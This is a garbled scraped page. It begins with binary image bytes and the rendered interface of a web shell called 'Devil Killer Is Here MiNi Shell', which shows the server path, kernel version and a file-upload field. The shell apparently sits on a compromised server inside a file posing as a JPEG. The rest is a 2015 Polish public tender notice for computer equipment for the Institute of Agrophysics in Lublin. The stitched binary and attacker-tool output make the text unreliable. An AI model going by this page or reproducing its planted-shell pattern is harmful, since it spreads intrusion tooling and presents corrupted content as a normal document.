JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150804/198466-N-2015.html

<p class="kh_header"><b>Lublin: Dostawa sprzętu komputerowego do Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk - 1 komplet w ramach projektu finansowanego przez NCBiR w ramach programu Biostrateg I Wsparcie dla rolnictwa niskoemisyjnego - zdolnego do adaptacji zmian klimatu obecnie oraz w perspektywie lat 2030 i 2050 (Zadanie 3) (akronim LCAgri, nr umowy BIOSTRATEG1 271322 3 NCBR 2015) znak sprawy: A-2401-23 2015 BIOSTRATEG1 271322 3 NCBR 2015</b><br>
<b>Numer ogłoszenia: 198466 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie , ul. Doświadczalna 4, 20-290 Lublin, woj. lubelskie, tel. 081 7445061 w. 110, faks 081 7445067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ipan.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut naukowy Polskiej Akademii Nauk.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego do Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk - 1 komplet w ramach projektu finansowanego przez NCBiR w ramach programu Biostrateg I Wsparcie dla rolnictwa niskoemisyjnego - zdolnego do adaptacji zmian klimatu obecnie oraz w perspektywie lat 2030 i 2050 (Zadanie 3) (akronim LCAgri, nr umowy BIOSTRATEG1 271322 3 NCBR 2015) znak sprawy: A-2401-23 2015 BIOSTRATEG1 271322 3 NCBR 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego do Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk - 1 komplet w ramach projektu finansowanego przez NCBiR w ramach programu Biostrateg I Wsparcie dla rolnictwa niskoemisyjnego - zdolnego do adaptacji zmian klimatu obecnie oraz w perspektywie lat 2030 i 2050 (Zadanie 3) (akronim LCAgri, nr umowy BIOSTRATEG1 271322 3 NCBR 2015) Wartość zamówienia: poniżej kwot określonych na podstawie przepisów art. 11 ust 8 Pzp. 
30213100-6 Komputery przenośne 
30231310-3 Wyświetlacze płaskie
30237460-1 Klawiatury komputerowe
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 2 do SIWZ - Opis przedmiotu zamówienia

1. Laptop 15,6 cala - 1 sztuka
Nazwa podzespołu, parametry:	Opis minimalnych wymagań: 
Procesor	Procesor klasy x86, 2 rdzeniowy, taktowany zegarem co najmniej 2,2GHz, pamięcią cache CPU co najmniej 3 MB L2  lub równoważny procesor klasy x86 zapewniający spełnienie poniższych kryteriów wydajności:
Procesor zaprojektowany do pracy w laptopach powinien osiągać w teście wydajności min. 3,523  pkt. PassMark - CPU Mark Laptop & Portable CPU Performance(wynik dostępny: w załączniku pobrany ze strony http:www.cpubenchmark.net laptop.html z dnia 30.07.2015 według załączonej listy (załącznik nr 9).
Pamięć RAM	4 GB
Dysk twardy	500 GB SATA III 
Karta graficzna	Grafika z linii kart dedykowanych do laptopów  powinna osiągać w tecie wydajności PassMark Performance Test co najmniej wyniki 719 punktów w G3D Mark (wynik na dzień 30.07.2015 r.) (załącznik nr 10)
Typ ekranu	15,6 cale, 1920 x 1080 (FullHD), matowa
Interfejsy komunikacyjne	Wi-Fi 802.11 ac, Bluetooth, LAN 1Gb
Złącza	Wyjścia: VGA, HDMI, 3 USB (2 USB3.0; 1 USB 2.0), zintegrowana kamera internetowa,  czytnik kart pamięci  SD, czytnik linii papilarnych
Wymiary	Waga max 2,4 kg  suma wymiarów laptopa nie powinna przekroczyć 660 mm (np. 377mm+ 256 mm+ 27 mm)
Praca na baterii	9 h
System operacyjny	Zainstalowany stabilny system operacyjny w języku polskim, zainstalowany na sprzęcie komputerowym objętym przedmiotem zamówienia, w pełni obsługujący pracę w domenie i kontrolę użytkowników w technologii ActiveDirectory, zcentralizowane zarządzanie oprogramowaniem i konfigurację systemu w technologii Group Policy.
Gwarancja	12 miesięcy


(CPV): 30231310-3 Wyświetlacze płaskie
2. Monitor 24 cala - 1 sztuka
Nazwa podzespołu, parametry:	Opis minimalnych wymagań: 
Typ ekranu
płaskoekranowy monitor panoramiczny IPS 23,8
przeciwodblaskowa powłoka
Jasność	250 cd na m2
Kontrast
	1000 :1 (typowy)
2 000 000 :1 (dynamiczny)
Wielkość plamki	0,27 mm
Kąty widzenia (pion łamane poziom)	178°łamane178°
Czas reakcji matrycy	8 ms
Kolory	16.7mln
Rozdzielczość matrycy 	FullHD
Rozdzielczość maksymalna	1920 x 1080
Ustawienia ekranu w pionie i poziomie	Pivot
Złącze	VGA, DVI-D (HDCP), Display Port, 
4 porty USB 2.0 (1 port do połączenia z komputerem, 4 porty do podłączania urządzeń)
Średnie użycie energii	Pobór prądy w trybie uśpienia  0,3 W
Podstwa	kompatybilność z VESA 100mm
Normy i standardy
	Monitory muszą być wykonane zgodnie  normami i posiadać Certyfikaty: TCO 5.0, EPEAT Gold, Energy Star 6.0
Gwarancja	36 miesięcy producenta

(CPV): 30237460-1 Klawiatury komputerowe
3. Klawiatura bezprzewodowa  - 1 sztuka
Nazwa podzespołu, parametry:	Opis minimalnych wymagań: 
Komunikacja z komputerem	Radiowa 
Interfejs	USB (nanoodbiornik)
Zasięg	10 m
Gwarancja	36 miesięcy producenta

Numeracja zgodna z SIWZ:
Rozwiązania równoważne: 
1) Ilekroć w opisie przedmiotu zamówienia zawartym w SIWZ wskazane zostały normy, znaki towarowe, patenty lub pochodzenie, należy rozumieć je tylko jako przykładowe, zamawiający dopuszcza rozwiązania (oferty) równoważne.
2) Za ofertę równoważną Zamawiający uzna tę, która spełnia wszystkie wymagania Zamawiającego określone w opisie przedmiotu zamówienia zawartym 
w Szczegółowym opisie przedmiotu zamówienia tj. w załączniku nr 2 do SIWZ oraz Zestawieniu wymaganych parametrów użytkowych stanowiących załącznik nr 3, 
do SIWZ, których parametry techniczne i funkcjonalne są identyczne lub lepsze niż wskazane w ww. zał. do SIWZ.
3) Ewentualne wskazane przez Zamawiającego nazwy, producenci mają na celu określenie klasy produktu będącego opisem przedmiotu zamówienia i służą ustaleniu standardu nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
4) Wykonawca, który powoła się na rozwiązania równoważne, jest obowiązany wykazać, 
że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.

6. Wykonawca udzieli Zamawiającemu gwarancji na urządzenie objęte przedmiotem zamówienia na okres minimum : 
zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 2 do SIWZ
6.1. Niezależnie od uprawnień z tytułu gwarancji, Zamawiający może wykonywać uprawnienia z tytułu rękojmi na zasadach ogólnych z tym, że okres rękojmi jest równy okresowi gwarancji.
7. Zamawiający nie dopuszcza składania ofert częściowych.
8. Dodatkowe informacje dotyczące zamówienia:
1) Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
2) Zamawiający nie przewiduje zamówień uzupełniających.
3) Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
4) Zamawiający nie przewiduje aukcji elektronicznej.
5) Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
6) Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 Pzp.
7) Zgodnie z art. 36 b ustawy Prawo zamówień publicznych Wykonawca wskazuje w ofercie części zamówienia, których wykonanie powierzy podwykonawcom. Informację w tym zakresie należy umieścić na formularzu ofertowym. W przypadku braku wskazania w formularzu ofertowym części zamówienia, której wykonanie będzie powierzone podwykonawcom, przyjmuje się, że całość zamówienia zostanie zrealizowana siłami własnymi Wykonawcy
Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia. 
Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcy, lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b uPzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 uPzp. 
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b uPzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 uPzp, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.13.10-3, 30.23.74.60-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca musi wykazać się należytym wykonaniem:
wykażą się należytym wykonaniem co najmniej jednej dostawy sprzętu komputerowego o wartości minimum: 2 200,00 złotych brutto (w ramach jednej dostawy) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
4) sytuacji ekonomicznej i finansowej, tj.: 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z postępowania, a warunki udziału w postępowaniu mogą zostać spełnione łącznie przez wykonawców składających ofertę wspólną, czyli w przypadku wykonawców  składających ofertę wspólną dokumenty przedkłada wykonawca spełniający dany warunek.
3.	Wykonawca jest zobowiązany wykazać, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w pkt 1 i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
5.	Ocena spełnienia  wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
6.	Wykonawcy, którzy nie wykażą spełniania wymaganych warunków zostaną wykluczeni z postępowania.

6.	WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU WYKAZANIA SPEŁNIANIA PRZEZ WYKONAWCĘ WARUNKÓW UDZIAŁU W POSTĘPOWANIU:

I. Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy.
1.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu (wg załącznika nr 4).
2.	Wykaz wykonanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane (wg załącznika nr 5) oraz załączeniem dowodów, czy zostały wykonane należycie. 
2.1.	Określenie dostaw, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach niewykonanych lub wykonanych nienależycie: 
2.1.1.	Wykaz winien wskazywać wykonanie:
dostaw sprzętu komputerowego o wartości minimum: 2 200,00 złotych brutto (w ramach jednej dostawy) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
2.1.2.	Złożone poświadczenia winny potwierdzać należyte wykonanie dostaw co najmniej w zakresie wymienionym w pkt 2.1.1.
2.2.	Dowodami, o których mowa w pkt 2) są:
2.2.1.	poświadczenie,
2.2.2.	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 2.2.1.
2.3.	W przypadku gdy zamawiający, na rzecz którego dostawy wskazane w wykazie, 
o którym mowa w pkt 2) zostały wykonane jest Instytut Agrofizyki 
im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 2.2. 
3.	Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

4.	W celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego, Zamawiający wymaga dostarczenia przez Wykonawcę wraz z ofertą: 

Załącznika nr 3 Zestawienie wymaganych parametrów technicznych i użytkowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Numeracja zgodna z SIWZ: 2.1.	Określenie dostaw, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach niewykonanych lub wykonanych nienależycie: 
2.1.1.	Wykaz winien wskazywać wykonanie:
dostaw sprzętu komputerowego o wartości minimum: 2 200,00 złotych brutto (w ramach jednej dostawy) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
2.1.2.	Złożone poświadczenia winny potwierdzać należyte wykonanie dostaw co najmniej w zakresie wymienionym w pkt 2.1.1.
2.2.	Dowodami, o których mowa w pkt 2) są:
2.2.1.	poświadczenie,
2.2.2.	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 2.2.1.
2.3.	W przypadku gdy zamawiający, na rzecz którego dostawy wskazane w wykazie, 
o którym mowa w pkt 2) zostały wykonane jest Instytut Agrofizyki 
im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 2.2. 
3.	Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego, Zamawiający wymaga dostarczenia przez Wykonawcę wraz z ofertą: 
Załącznika nr 3 Zestawienie wymaganych parametrów technicznych i użytkowych.
Forma dokumentów: 
1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu, wymagane w pkt I ppkt 1 oraz dokumenty, o których mowa w pkt I ppkt 4 oraz pkt IV winny być składane w formie oryginału.
2)	Dokumenty, o których mowa w pkt I ppkt 2 i ppkt 3, pkt II, pkt III winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci za zgodność z oryginałem.
3)	Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, jakie mają dostarczyć wykonawcy w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy:
1)	Oświadczenie o braku podstaw do wykluczenia (wg załącznika nr 6).
2)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

III. Dokumenty Wykonawców zagranicznych:
